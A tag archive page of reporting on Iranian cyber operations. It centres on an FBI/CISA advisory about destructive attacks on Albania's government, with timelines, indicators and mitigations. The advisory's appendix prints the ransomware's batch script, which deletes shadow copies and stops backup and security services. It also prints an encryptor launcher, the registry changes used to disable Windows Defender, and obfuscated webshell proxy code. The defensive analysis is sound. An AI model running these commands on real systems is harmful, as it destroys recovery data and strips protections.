Tag Archive for: Iranian

Hackers Use Telegram, Signal, Dark Web to Help Iranian Protesters


Protesters against the Iran regime are getting a boost to aid their efforts from hacking groups who are using Telegram, Signal and the dark web to get around government restrictions.

“Key activities are data leaking and selling, including officials’ phone numbers and emails, and maps of sensitive locations. CPR sees the sharing of open VPN servers to bypass censorship and reports on the internet status in Iran, as well as the hacking of conversations and guides,” according to a blog post by Check Point Research (CPR), which shared five examples of the counterprotesters’ activities.

Telegram groups, the researchers said, include between 900 to 1,200 members, some of which offer a list of proxies and a VPN to maneuver around Iranian government censorship while another group helps protesters gain access to social media.

CPR noted the activities the day after protests began following the death of Mahsa Amini. “Specifically, hacker groups are allowing people in Iran to communicate with each other, share news and what is going on in different places, which is what the government is trying to avoid, to lower the flames,” CPR said. “As per usual with these uprisings, there are some hacking groups that are trying to make a profit from the situation and to sell information from Iran and the regime.”

Researchers specifically called out the Official Atlas Intelligence Group channel, a group with 900 members that uses Telegram to leak and sell data. They are “focusing on leaking data that can help against the regime in Iran, including officials’ phone numbers and emails and maps of sensitive locations,” PCR said, as well as “upsell” private information on the Iranian Revolutionary Guard Corp (RGC). They are also offering a list of proxies to help protesters bypass censorship in Iran.

The 5,000-strong Arvin group is also using the messaging platform to leak and sell data. Its focus is “on news from the protests in Iran, reports and videos from the streets where the protests are in Iran,” CPR said. They also provide Open VPN services and report on internet status in the country.

Red Blue is another group with 4,000 members and is also using Telegram to hack…

Source…

Iranian State Actors Conduct Cyber Operations Against the Government of Albania


The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory to provide information on recent cyber operations against the Government of Albania in July and September. This advisory provides a timeline of activity observed, from initial access to execution of encryption and wiper attacks. Additional information concerning files used by the actors during their exploitation of and cyber attack against the victim organization is provided in Appendices A and B.

In July 2022, Iranian state cyber actors—identifying as “HomeLand Justice”—launched a destructive cyber attack against the Government of Albania which rendered websites and services unavailable. A FBI investigation indicates Iranian state cyber actors acquired initial access to the victim’s network approximately 14 months before launching the destructive cyber attack, which included a ransomware-style file encryptor and disk wiping malware. The actors maintained continuous network access for approximately a year, periodically accessing and exfiltrating e-mail content.

Between May and June 2022, Iranian state cyber actors conducted lateral movements, network reconnaissance, and credential harvesting from Albanian government networks. In July 2022, the actors launched ransomware on the networks, leaving an anti-Mujahideen E-Khalq (MEK) message on desktops. When network defenders identified and began to respond to the ransomware activity, the cyber actors deployed a version of ZeroCleare destructive malware.

In June 2022, HomeLand Justice created a website and multiple social media profiles posting anti-MEK messages. On July 18, 2022, HomeLand Justice claimed credit for the cyber attack on Albanian government infrastructure. On July 23, 2022, Homeland Justice posted videos of the cyber attack on their website. From late July to mid-August 2022, social media accounts associated with HomeLand Justice demonstrated a repeated pattern of advertising Albanian Government information for release, posting a poll asking respondents to select the government information to be released by HomeLand Justice, and then releasing that information—either in a .zip file or a video of a screen recording with the documents shown.

In September 2022, Iranian cyber actors launched another wave of cyber attacks against the Government of Albania, using similar TTPs and malware as the cyber attacks in July. These were likely done in retaliation for public attribution of the cyber attacks in July and severed diplomatic ties between Albania and Iran.

Download the PDF version of this report: pdf, 1221 kb

Initial access

Timeframe: Approximately 14 months before encryption and wiper attacks.

Details: Initial access was obtained via exploitation of an Internet-facing Microsoft SharePoint, exploiting CVE-2019-0604.

Persistence and Lateral movement

Timeframe: Approximately several days to two months after initial compromise.

Details: After obtaining access to the victim environment, the actors used several .aspx webshells, pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence. During this timeframe, the actors also used RDP (primarily), SMB, and FTP for lateral movement throughout the victim environment.

Exchange Server compromise

Timeframe: Approximately 1-6 months after initial compromise.

Details: The actors used a compromised Microsoft Exchange account to run searches (via CmdLets New-MailboxSearch and Get-Recipient) on various mailboxes, including for administrator accounts. In this timeframe, the actors used the compromised account to create a new Exchange account and add it to the Organization Management role group.

Likely Email exfiltration

Timeframe: Approximately 8 months after initial compromise.

Details: The actors made thousands of HTTP POST requests to Exchange servers of the victim organization. The FBI observed the client transferring roughly 70-160 MB of data, and the server transferring roughly 3-20 GB of data.

VPN activity

Timeframe: Approximately 12-14 months after initial compromise.

Details: Approximately twelve months after initial access and two months before launching the destructive cyber attack, the actors made connections to IP addresses belonging to the victim organization’s Virtual Private Network (VPN) appliance. The actors’ activity primarily involved two compromised accounts. The actors executed the “Advanced Port Scanner” (advanced_port_scanner.exe). The FBI also found evidence of Mimikatz usage and LSASS dumping.

File Cryptor (ransomware-style file encryptor)

Timeframe: Approximately 14 months after initial compromise.

Details: For the encryption component of the cyber attack, the actor logged in to a victim organization print server via RDP and kicked off a process (Mellona.exe) which would propagate the GoXml.exe encryptor to a list of internal machines, along with a persistence script called win.bat. As deployed, GoXML.exe encrypted all files (except those having extensions .exe, .dll, .sys, .lnk, or .lck) on the target system, leaving behind a ransom note titled How_To_Unlock_MyFiles.txt in each folder impacted.

Wiper attack

Timeframe: Approximately 14 months after initial compromise.

Details: In the same timeframe as the encryption attack, the actors began actions that resulted in raw disk drives being wiped with the Disk Wiper tool (cl.exe) described in Appendix A. Approximately over the next eight hours, numerous RDP connections were logged from an identified victim server to other hosts on the victim’s network. Command line execution of cl.exe was observed in cached bitmap files from these RDP sessions on the victim server.

  • Ensure anti-virus and anti-malware software is enabled and signature definitions are updated regularly and in a timely manner. Well-maintained anti-virus software may prevent use of commonly deployed cyber attacker tools that are delivered via spear-phishing.
  • Adopt threat reputation services at the network device, operating system, application, and email service levels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and IP addresses used in spear-phishing attacks.
  • If your organization is employing certain types of software and appliances vulnerable to known Common Vulnerabilities and Exposures (CVEs), ensure those vulnerabilities are patched. Prioritize patching known exploited vulnerabilities.
  • Monitor for unusually large amounts of data (i.e. several GB) being transferred from a Microsoft Exchange server.
  • Check the host-based indications, including webshells, for positive hits within your environment.

Additionally, FBI and CISA recommend organizations apply the following best practices to reduce risk of compromise:

  • Maintain and test an incident response plan.
  • Ensure your organization has a vulnerability management program in place and that it prioritizes patch management and vulnerability scanning of known exploited vulnerabilities. Note: CISA’s Cyber Hygiene Services (CyHy) are free to all state, local, tribal, and territorial (SLTT) organizations, as well as public and private sector critical infrastructure organizations.
  • Properly configure and secure internet-facing network devices.
    • Do not expose management interfaces to the internet.
    • Disable unused or unnecessary network ports and protocols.
    • Disable/remove unused network services and devices.
  • Adopt zero-trust principles and architecture, including:
    • Micro-segmenting networks and functions to limit or block lateral movements.
    • Enforcing phishing-resistant multifactor authentication (MFA) for all users and VPN connections.
    • Restricting access to trusted devices and users on the networks.

For more information on Iranian government-sponsored malicious cyber activity, see CISA’s webpage – Iran Cyber Threat Overview and Advisories.

Appendix A

Host-based IOCs

Additional details concerning some of these files are provided in Appendix B.

File

MD5 Hash

Notes

Error4.aspx

81e123351eb80e605ad73268a5653ff3

Webshell

cl.exe

7b71764236f244ae971742ee1bc6b098

Wiper

GoXML.exe

bbe983dba3bf319621b447618548b740

Encryptor

Goxml.jpg

0738242a521bdfe1f3ecc173f1726aa1

 

ClientBin.aspx

a9fa6cfdba41c57d8094545e9b56db36

Webshell (reverse-proxy connections)

Pickers.aspx

8f766dea3afd410ebcd5df5994a3c571

Webshell

evaluatesiteupgrade.cs.aspx

Unknown

Webshell

mellona.exe

78562ba0069d4235f28efd01e3f32a82

Propagation for Encryptor

win.bat

1635e1acd72809479e21b0ac5497a79b

Launches GoXml.exe on startup

win.bat

18e01dee14167c1cf8a58b6a648ee049

Changes desktop background to encryption image

bb.bat

59a85e8ec23ef5b5c215cd5c8e5bc2ab

Saves SAM and SYSTEM hives to C:\Temp, makes cab archive

disable_defender.exe

60afb1e62ac61424a542b8c7b4d2cf01

Disables Windows Defender

rwdsk.sys

8f6e7653807ebb57ecc549cef991d505

Raw disk driver utilized by wiper malware

App_Web_bckwssht.dll

e9b6ecbf0783fa9d6981bba76d949c94

 

 

Network-based IOCs

FBI review of Commercial VPN service IP addresses revealed the following resolutions (per Akamai data):

Country

Company

AL

KEMINET LTD.

DE

NOOP-84-247-59-0-25

DE

GSL NETWORKS

GB

LON-CLIENTS

GB

GB-DATACENTER

NL

NL-LAYERSWITCH-20190220

NL

PANQ-45-86-200-0

US

PRIVATE CUSTOMER

US

BANDITO NETWORKS

US

EXTERNAL

US

RU-SELENA-20080725

US

TRANS OCEAN NETWORK

Appendix B

Ransomware Cryptor

GoXML.exe is a ransomware style file encryptor. It is a Windows executable, digitally signed with a certificate issued to the Kuwait Telecommunications Company KSC, a subsidiary of Saudi Telecommunications Company (STC).

If executed with five or more arguments (the arguments can be anything, as long as there are five or more), the program silently engages its file encryption functionality. Otherwise, a file-open dialog Window is presented, and any opened documents receive an error prompt labeled, Xml Form Builder.

All internal strings are encrypted with a hard coded RC4 key. Before internal data is decrypted, the string decryption routine has a built-in self-test that decrypts a DWORD value and tests to see if the plaintext is the string yes. If so, it will continue to decode its internal strings.

The ransomware will attempt to launch the following batch script; however, this will fail due to a syntax error.

@for /F “skip=1” %C in (‘wmic LogicalDisk get DeviceID’) do (@wmic /namespace:\\root\default Path SystemRestore Call disable “%C\” & @rd /s /q %C\$Recycle.bin)

@vssadmin.exe delete shadows /all /quiet

@set SrvLst=vss sql svc$ memtas mepos sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr DefWatch ccEvtMgr ccSetMgr SavRoam RTVscan QBFCService QBIDPService ntuit.QuickBooks.FCS QBCFMonitorService YooBackup YooIT zhudongfangyu sophos stc_raw_agent VSNAPVSS VeeamTransportSvc VeeamDeploymentService VeeamNFSSvc veeam PDVFSService BackupExecVSSProvider BackupExecAgentAccelerator BackupExecAgentBrowser BackupExecDiveciMediaService BackupExecJobEngine BackupExecManagementService BackupExecRPCService AcrSch2Svc AcronisAgent CASAD2DWebSvc CAARCUpdateSvc

@for %C in (%SrvLst%) do @net stop %C

@set SrvLst=

@set PrcLst=mysql sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspub onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad

@for %C in (%PrcLst%) do @taskkill /f /im “%C.exe”

@set PrcLst=

@exit

 

The syntax error consists of a missing backslash that separates system32 and cmd.exe, so the process is launched as system32cmd.exe which is an invalid command.

Script Launch Bug

 

The ransomware’s file encryption routine will generate a random string, take the MD5 hash and use that to generate an RC4 128 key which is used to encrypt files. This key is encrypted with a hard coded Public RSA key and converted to Base64 utilizing a custom alphabet. This is appended to the end of the ransom note.

The cryptor places a file called How_To_Unlock_MyFiles.txt in directories with encrypted files.

Each encrypted file is given the .lck extension and the contents of each file are only encrypted up to 0x100000 or 1,048,576 bytes which is a hard coded limit.

Separately, the actor ran a batch script (win.bat below) to set a specific desktop background.

File Details

GoXml.exe

File Size:

43.48 KB (44520 bytes)

SHA256:

f116acc6508843f59e59fb5a8d643370dce82f492a217764521f46a856cc4cb5

SHA1:

5d117d8ef075f3f8ed1d4edcc0771a2a0886a376

MD5:

bbe983dba3bf319621b447618548b740

SSDeep:

768:+OFu8Q3w6QzfR5Jni6SQD7qSFDs6P93/q0XIc/UB5EPABWX

:RFu8QAFzffJui79f13/AnB5EPAkX (Ver 1.1)

File Type:

PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

PE Header Timestamp:

2016-04-30 17:08:19

ImpHash:

5b2ce9270beea5915ec9adbcd0dbb070

Cert #0 Subject C=KW, L=Salmiya, O=Kuwait Telecommunications Company KSC, OU=Kuwait Telecommunications Company, CN=Kuwait Telecommunications Company KSC

Cert #0 Issuer  C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Assured ID Code Signing CA

Cert #0 SHA1    55d90ec44b97b64b6dd4e3aee4d1585d6b14b26f

 

win.bat (#1, run malware)

File Size:

67 bytes

SHA256:

bad65769c0b416bb16a82b5be11f1d4788239f8b2ba77ae57948b53a69e230a6

SHA1:

14b8c155e01f25e749a9726958606b242c8624b9

MD5:

1635e1acd72809479e21b0ac5497a79b

SSDeep:

3:LjTFKCkRErG+fyM1KDCFUF82G:r0aH1+DF82G (Ver 1.1)

File Type:

ASCII text, with no line terminators

Contents:

start /min C:\ProgramData\Microsoft\Windows\GoXml.exe 1 2 3 4 5 6 7

 

win.bat (#2, install desktop image)

Filename:

ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2

File Size:

765 bytes

SHA256:

ec4cd040fd14bff86f6f6e7ba357e5bcf150c455532800edf97782836e97f6d2

SHA1:

fce0db6e66d227d3b82d4564446ede0c0fd7598c

MD5:

18e01dee14167c1cf8a58b6a648ee049

SSDeep:

12:wbYVJ69/TsdLd6sdLd3mTDwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV+EVTCuwfV

+Et:wq69/kZxZ3mTDY9HY9HY9HY9HY9j (Ver 1.1)

File Type:

DOS batch file text, ASCII text, with CRLF line terminators

Contents:

@echo off

setlocal enabledelayedexpansion

set “Wtime=!time:~0,2!”

if “!Wtime!” leq “20” reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /t REG_SZ /d “c:\programdata\GoXml.jpg” /f & goto done

if “!Wtime!” geq “20” reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /t REG_SZ /d “c:\programdata\GoXml.jpg” /f & goto done

:done

timeout /t 5 >nul

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

start “” /b RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters ,1 ,True

endlocal

 

goxml.jpg

File Size:

1.2 MB (1259040 bytes)

SHA256:

63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9

SHA1:

683eaec2b3bb5436f00b2172e287dc95e2ff2266

MD5:

0738242a521bdfe1f3ecc173f1726aa1

SSDeep:

12288:ME0p1RE70zxntT/ylTyaaSMn2fS+0M6puxKfJbDKrCxMe5fPSC2tmx

VjpJT/n37p:MHyUt7yQaaPXS6pjar+MwrjpJ7VIbZg (Ver 1.1)

File Type:

JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484TIFF image data, big-endian, direntries=13, height=1752, bps=0, PhotometricIntepretation=CMYK, orientation=upper-left, width=2484], progressive, precision 8, 2484×1752, components 4

Software:

Adobe Photoshop 22.4 (Windows)

Modify Date:

2022-07-13 20:45:20

Create Date:

2020-06-11 02:13:33

Metadata Date:

2022-07-13 20:45:20

Profile Date Time:

2000-07-26 05:41:53

Image Size:

2484×1752

File Size:

1.2 MB (1259040 bytes)

SHA256:

63dd02c371e84323c4fd9a161a75e0f525423219e8a6ec1b95dd9eda182af2c9

Disk Wiper

The files cl.exe and rwdsk.sys are part of a disk wiper utility that provides raw access to the hard drive for the purposes of wiping data. From the command line the cl.exe file accepts the arguments:

  • in
  • un
  • wp <optional argument>

If executed with the in command, the utility will output in start! and installs a hard coded file named rwdsk.sys as a service named RawDisk3. The .SYS file is not extracted from the installer however, but rather the installer looks for the file in the same directory that the cl.exe is executed in. 

It will also load the driver after installation.

The un command uninstalls the service, outputting the message “un start!” to the terminal.
The wp command will access the loaded driver for raw disk access.

Raw Disk Access

The long hexadecimal string is hard coded in the cl.exe binary.

      RawDisk3File = (void *)toOpenRawDisk3File(

                               arg2_WideCharStr,

                               0xC0000000,

                               L”B4B615C28CCD059CF8ED1ABF1C71FE03C0354522990AF63ADF3C911E2287A4B906D47D”);

      ptrRawDiskFile = RawDisk3File;

      if ( RawDisk3File )

      {

        sizeDisk = toGetDiskSize(RawDisk3File);

        terminal_out(“Total Bytez : %lld\n”, sizeDisk << 9);

The wp command also takes an additional argument as a device path to place after \RawDisk3\ in the output string. It is uncertain what creates this path to a device as the driver tested did not.

The output is “wp starts!” followed by the total bytes of the drive and the time the wipe operation takes.

If the registry key value HKLM\SOFTWARE\EldoS\EventLog is set to “Enabled”, the install will generate an event log if at any time the install produces an error. This log contains an error code DWORD followed by the string ..\..\DriverLibraries\DrvSupLib\install.c. If the system does not have the SOFTWARE\EldoS key, no event logs would be produced. This feature must be a related to the legitimate EldoS utility. 

rwdsk.sys is a “legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer’s hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.”

File Details

cl.exe

 

File Size

142.5 KB (145920 bytes)

SHA256

e1204ebbd8f15dbf5f2e41dddc5337e3182fc4daf75b05acc948b8b965480ca0

SHA1

f22a7ec80fbfdc4d8ed796119c76bfac01e0a908

MD5

7b71764236f244ae971742ee1bc6b098

SSDeep

3072:vv2ADi7yOcE/YMBSZ0fZX4kpK1OhJrDwM:vv2jeQ/flfZbKM (Ver 1.1)

Filetype

PE32+ executable (console) x86-64, for MS Windows

PE Header Timestamp

2022-07-15 13:26:28

ImpHash

58d51c1152817ca3dec77f2eee52cbef

 

rwdsk.sys

 

File Size

38.84 KB (39776 bytes)

SHA256

3c9dc8ada56adf9cebfc501a2d3946680dcb0534a137e2e27a7fcb5994cd9de6

SHA1

5e061701b14faf9adec9dd0b2423ff3cfc18764b

MD5

8f6e7653807ebb57ecc549cef991d505

SSDeep

768:E31ySCpoCbXnfDbEaJSooKIDyE9aBazWlEAusxsia:0gyCb3MFKIHO4Ausxta (Ver 1.1)

Filetype

PE32+ executable (native) x86-64, for MS Windows

PEtype

Driver

PE Header Timestamp

2016-03-18 14:44:54

ImpHash

e233f2cdc91faafe1467d9e52f166213

Cert #0 Subject

CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US

Cert #0 Issuer

CN=VeriSign Time Stamping Services CA, O=VeriSign, Inc., C=US

Cert #0 SHA1

382c18388fb326221dfd7a77ee874f9ba60e04bf

Cert #1 Subject

C=US, ST=California, L=SANTA CLARA, O=NVIDIA Corporation, CN=NVIDIA Corporation

Cert #1 Issuer

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA

Cert #1 SHA1

30632ea310114105969d0bda28fdce267104754f

Cert #2 Subject

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5

Cert #2 Issuer

C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Code Verification Root

Cert #2 SHA1

57534ccc33914c41f70e2cbb2103a1db18817d8b

Cert #3 Subject

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=Terms of use at https://www.verisign.com/rpa (c)10, CN=VeriSign Class 3 Code Signing 2010 CA

Cert #3 Issuer

C=US, O=VeriSign, Inc., OU=VeriSign Trust Network, OU=(c) 2006 VeriSign, Inc. – For authorized use only, CN=VeriSign Class 3 Public Primary Certification Authority – G5

Cert #3 SHA1

495847a93187cfb8c71f840cb7b41497ad95c64f

 

Additional Files

Web Deployed Reverse Proxy

Description

ClientBin.aspx is an ASP file that contains a Base64 encoded .Net executable (App_Web_bckwssht.dll) that it decodes and loads via Reflection. The .Net executable contains Class and Method obfuscation and internal strings are encoded with a single byte XOR obfuscation.

public static string hair_school_bracket()
        {
            return Umbrella_admit_arctic.rebel_sadreporthospital(“460F2830272A2F2266052928202F21661627252D27212368”);  //Invalid Config Package.
        }

public static string Visual_math_already()
        {
       return Umbrella_admit_arctic.rebel_sadreporthospital(“5304057E0116001607”);   //WV-RESET

The method rebel_sadreporthospital takes the first byte of the encoded string and XOR’s each subsequent byte to produce the de-obfuscated string.

When run in context of an IIS web server connecting to the ASPX file will generate a 200 <Encryption DLL Info> 1.5 output.
 

Initial connection

The hex string represents the following ASCII text:

Base64, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null

Sending a POST request with a Base64 encoded IP and port will open a second socket to the supplied IP and port making this a Web proxy. 

Second Socket Opened from POST Request

Sending a request to WV-RESET with a value will produce an OK response and call a function to shut down the proxy socket.

Terminate socket

The DLL extracts a secondary “EncryptionDLL” named Base64.dll which is loaded via Assembly.Load. This exposes two functions, encrypt and decrypt. This DLL is used to decrypt the Proxy IP and port along with data. In this instance the class name is misspelled Bsae64, which is also reflected in the calling DLLs decoded strings. It is uncertain as to why an additional Base64.dll binary is extracted when the same encoding could be hard coded in the original DLL. It is possible other versions of this tool utilize differing “EncryptionDLL” binaries.
 

Misspelled Class Name
Called Misspelled Name

File Details

ClientBin.aspx

 

File Size

55.24 KB (56561 bytes)

SHA256

7ad64b64e0a4e510be42ba631868bbda8779139dc0daad9395ab048306cc83c5

SHA1

e03edd9114e7a0138d1309034cad6b461ab0035b

MD5

a9fa6cfdba41c57d8094545e9b56db36

SSDeep

768:x9TfK6nOgo5zE/cezUijAwZIFxK1mGjncrF8EAZ0iBDZBZdywb0DwHN4N4wjMxr8:x9TfdOgAi2 (Ver 1.1)

Filetype

HTML document text, ASCII text, with very long lines (56458)

 

App_Web_bckwssht.dll

 

File Size

41.0 KB (41984 bytes)

SHA256

cad2bc224108142b5aa19d787c19df236b0d12c779273d05f9b0298a63dc1fe5

SHA1

49fd8de33aa0ea0c7432d62f1ddca832fab25325

MD5

e9b6ecbf0783fa9d6981bba76d949c94

SSDeep

384:coY4jnD7l9VAk1dtrGBlLGYEX1tah8dgNyamGOvMTfdYN5qZAsP:hlXAkHRGBlUUh8cFmpv6feYLP (Ver 1.1)

Filetype

PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows

PEtype

DLL

PE Header Timestamp

2021-06-07 10:37:55

ImpHash

dae02f32a21e03ce65412f6e56942daa

Disable Defender

Description

disable_defender.exe is a Microsoft Windows PE file that attempts to disable Windows Defender. The application will elevate privileges to that of SYSTEM and then attempt to disable Defender’s core functions. A command prompt with status and error messages is displayed as the application executes. No network activity was detected during the evaluation.

Upon execution, a command prompt is launched and a message is displayed if the process is not running as SYSTEM. The process is then restarted with the required permissions.

Test validate permissions

The application will attempt to terminate the Windows Defender process by calling TerminateProcess for smartscreen.exe:

Attempt to kill Windows Defender

The following Registry Keys were modified to disable Windows Defender:

Set Registry Values (observed Win10 1709)

 

HKLM\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection 

 

 

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware 

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
StartupApproved\Run\SecurityHealth 

03 00 00 00 5D 02 00 00 41 3B 47 9D 

HKLM\SOFTWARE\Microsoft\Windows Defender\DisableAntiSpyware 

HKLM\System\CurrentControlSet\Services\WinDefend\Start 

HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection\
DisableRealtimeMonitoring 

Upon completion and if successful the application will display the following messages and wait for user input.

User Input

disable-defender.exe

 

File Size

292.0 KB (299008 bytes)

SHA256

45bf0057b3121c6e444b316afafdd802d16083282d1cbfde3cdbf2a9d0915ace

SHA1

e866cc6b1507f21f688ecc2ef15a64e413743da7

MD5

60afb1e62ac61424a542b8c7b4d2cf01

SSDeep

6144:t2WhikbJZc+Wrbe/t1zT/p03BuGJ1oh7ISCLun:t2WpZnW+/tVoJ1ouQ (Ver 1.1)

Filetype

PE32+ executable (console) x86-64, for MS Windows

PEtype

EXE

PE Header Timestamp

2021-10-24 15:07:32

ImpHash

74a6ef9e7b49c71341e439022f643c8e

Source…

Three Iranian nationals charged with hacking New Jersey targets


The U.S. Department of Justice unsealed an indictment Sept. 14 charging three Iranian nationals with allegedly running a massive, global ransomware operation that hacked into the computer networks of multiple U.S. victims, including several in the Garden State.

The indictment charges Mansour Ahmadi, Ahmad Khatibi Aghda and Amir Hossein Nickaein Ravari of engaging in the scheme. The three, who are residents of Iran, are each charged with one count of conspiring to commit computer fraud and related activity, one count of intentionally damaging a protected computer, and one count of transmitting a demand in relation to damaging a protected computer.

“The Government of Iran has created a safe haven where cyber criminals acting for personal gain flourish and defendants like these are able to hack and extort victims, including critical infrastructure providers,” said Assistant Attorney General Matthew Olsen of the Justice Department’s National Security Division. “This indictment makes clear that even other Iranians are less safe because their own government fails to follow international norms and stop Iranian cyber criminals.”

Staying safe

cybersecurity

The hacking allegedly exploited vulnerabilities in software and networks to gain access and exfiltrate data and information from victims’ computer systems. The indictment also accuses the trio of denying victims access to their systems and data unless a ransom payment was made.

The three men are accused of victimizing a broad range of organizations, including small businesses, government agencies, nonprofit programs and institutions, as well as critical infrastructure sectors such as health care centers, transportation services and utility providers.

Here in New Jersey, according to court documents, the defendants targeted a township in Union County in February 2021, gaining control and access to the township’s network and data and using a hacking tool to establish persistent remote access to a particular domain that was registered to one of the men.

They are also accused of targeting a Morris County-based accounting firm in or before February 2022, using a hacking tool to establish a connection to a server registered to one of…

Source…

Iranian Islamic Revolutionary Guard Corps-Affiliated Cyber Actors Exploiting Vulnerabilities for Data Extortion and Disk Encryption for Ransom Operations


Summary

Actions to take today to protect against ransom operations:

• Keep systems and software updated and prioritize remediating known exploited vulnerabilities.
• Enforce MFA.
• Make offline backups of your data.

This joint Cybersecurity Advisory (CSA) is the result of an analytic effort among the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), U.S. Cyber Command (USCC) – Cyber National Mission Force (CNMF), the Department of the Treasury (Treasury), the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), and the United Kingdom’s National Cyber Security Centre (NCSC) to highlight continued malicious cyber activity by advanced persistent threat (APT) actors that the authoring agencies assess are affiliated with the Iranian Government’s Islamic Revolutionary Guard Corps (IRGC). Note: The IRGC is an Iranian Government agency tasked with defending the Iranian Regime from perceived internal and external threats. Hereafter, this advisory refers to all the coauthors of this advisory as “the authoring agencies.”

This advisory updates joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, which provides information on these Iranian government-sponsored APT actors exploiting known Fortinet and Microsoft Exchange vulnerabilities to gain initial access to a broad range of targeted entities in furtherance of malicious activities, including ransom operations. The authoring agencies now judge these actors are an APT group affiliated with the IRGC.

Since the initial reporting of this activity in the FBI Liaison Alert System (FLASH) report APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity from May 2021, the authoring agencies have continued to observe these IRGC-affiliated actors exploiting known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities for initial access. The IRGC-affiliated actors have used this access for follow-on activity, including disk encryption and data extortion, to support ransom operations.

The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple U.S. critical infrastructure sectors as well as Australian, Canadian, and United Kingdom organizations. These actors often operate under the auspices of Najee Technology Hooshmand Fater LLC, based in Karaj, Iran, and Afkar System Yazd Company, based in Yazd, Iran. The authoring agencies assess the actors are exploiting known vulnerabilities on unprotected networks rather than targeting specific targeted entities or sectors.

This advisory provides observed tactics, techniques, and indicators of compromise (IOCs) that the authoring agencies assess are likely associated with this IRGC-affiliated APT. The authoring agencies urge organizations, especially critical infrastructure organizations, to apply the recommendations listed in the Mitigations section of this advisory to mitigate risk of compromise from these IRGC-affiliated cyber actors.

For a downloadable copy of IOCs, see AA22-257A.stix.

For more information on Iranian state-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threat webpage.

Download the PDF version of this report: pdf, 836 kb

Technical Details

Threat Actor Activity

As reported in joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities, the authoring agencies have observed Iranian government-sponsored APT actors scanning for and/or exploiting the following known Fortinet FortiOS and Microsoft Exchange server vulnerabilities since early 2021 to gain initial access to a broad range of targeted entities: CVE-2018-13379, CVE-2020-12812, CVE-2019-5591, and CVE-2021-34473 (a ProxyShell vulnerability). The authoring agencies have also observed these APT actors leveraging CVE-2021-34473 against U.S. networks in combination with ProxyShell vulnerabilities CVE-2021-34523 and CVE-2021-31207. The NCSC judges that Yazd, Iran-based company Afkar System Yazd Company is actively targeting UK organizations. Additionally, ACSC judges that these APT actors have used CVE-2021-34473 in Australia to gain access to systems. The APT actors can leverage this access for further malicious activities, including deployment of tools to support ransom and extortion operations, and data exfiltration.

Since the activity was reported in 2021, these IRGC-affiliated actors have continued to exploit known vulnerabilities for initial access. In addition to exploiting Fortinet and Microsoft Exchange vulnerabilities, the authoring agencies have observed these APT actors exploiting VMware Horizon Log4j vulnerabilities CVE-2021-44228 (“Log4Shell”), CVE-2021-45046, and CVE-2021-45105 for initial access.

The IRGC-affiliated actors have used their access for ransom operations, including disk encryption and extortion efforts. After gaining access to a network, the IRGC-affiliated actors likely determine a course of action based on their perceived value of the data. Depending on the perceived value, the actors may encrypt data for ransom and/or exfiltrate data. The actors may sell the data or use the exfiltrated data in extortion operations or “double extortion” ransom operations where a threat actor uses a combination of encryption and data theft to pressure targeted entities to pay ransom demands.

IRGC-affiliated actor activity observed by the authoring agencies includes:

  • In December 2021, the actors exploited ProxyShell vulnerabilities (likely CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207) on a Microsoft Exchange server to gain access to the network of a U.S. police department. The actors used their access to move laterally within the network, encrypt network devices with BitLocker, and hold the decryption keys for ransom.
